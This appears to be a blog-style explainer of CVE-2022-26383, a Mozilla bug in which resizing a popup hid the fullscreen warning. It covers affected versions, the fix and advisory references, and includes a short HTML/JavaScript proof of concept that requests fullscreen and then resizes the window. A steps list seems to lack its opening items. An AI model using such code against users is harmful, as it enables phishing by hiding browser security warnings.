CVE-2022-26383 - Popup Resizing Tricks Fullscreen on Firefox & Thunderbird

Let’s talk about CVE-2022-26383, a quirky but dangerous bug that affected three major Mozilla products: Firefox, Firefox ESR, and Thunderbird—all before their March 2022 updates. Though this flaw sounds technical, the idea is simple: with the right moves, a website could sneak past browser security to show full-screen content without alerting you. That’s bad news if an attacker wants to fool or scam users.

What Is CVE-2022-26383?

Browsers are supposed to *warn you* when they switch to fullscreen—think of that gray bar at the top that says, “You are now viewing full-screen.” But with this bug, if a website pops up a window, asks for fullscreen, then resizes it just right, the notification bar fails to show up.

> Impacted Versions:  
> - Firefox < 98  
> - Firefox ESR < 91.7  
> - Thunderbird < 91.7

The user might not notice anything is off and could be tricked by a phishing page or imitate a legit site’s look and feel.

Rapidly resizes the popup using JavaScript.

If timed just right, the fullscreen notification doesn't show.

Here’s a simple version of the trick (you won’t see this work on today’s browsers!)

<!DOCTYPE html>
<html>
<body>
<script>
function openSneakyPopup() {
  // Open a popup
  let popup = window.open(
    "", 
    "Sneaky", 
    "width=600,height=400"
  );
  popup.document.write(`
    <button id='fs'>GoFullscreen</button>
    <script>
      document.getElementById('fs').onclick = function() {
        // Request fullscreen when button is clicked
        document.body.requestFullscreen();
        // Sneakily resize after request
        setTimeout(() => {
          window.resizeTo(800, 600);
        }, 50); // Triggers the bug in old Firefox
      }
    <\/script>
  `);
}
</script>

<button onclick="openSneakyPopup()">Open Exploit Popup</button>
</body>
</html>

If run in a vulnerable version of Firefox, this code opens a popup, requests fullscreen, and resizes to hide the notification bar. The user never sees the alert!

How Is It Fixed?

Mozilla patched this bug in March 2022. From version 98 of Firefox and version 91.7 of Thunderbird/ESR, the browser correctly shows the notification bar even after resizing. Attackers lose their trick.

References

- Mozilla Security Advisory 2022-09
- NIST NVD Entry CVE-2022-26383
- Mozilla Bugzilla #1757236

TL;DR

CVE-2022-26383 was a slick bug letting popup windows trick you and the browser, entering fullscreen without showing a warning. If you’re using an updated browser, you’re safe. If not, now you know why it’s dangerous and how easy it was to abuse.

Timeline

Published on: 12/22/2022 20:15:00 UTC
Last modified on: 12/30/2022 15:02:00 UTC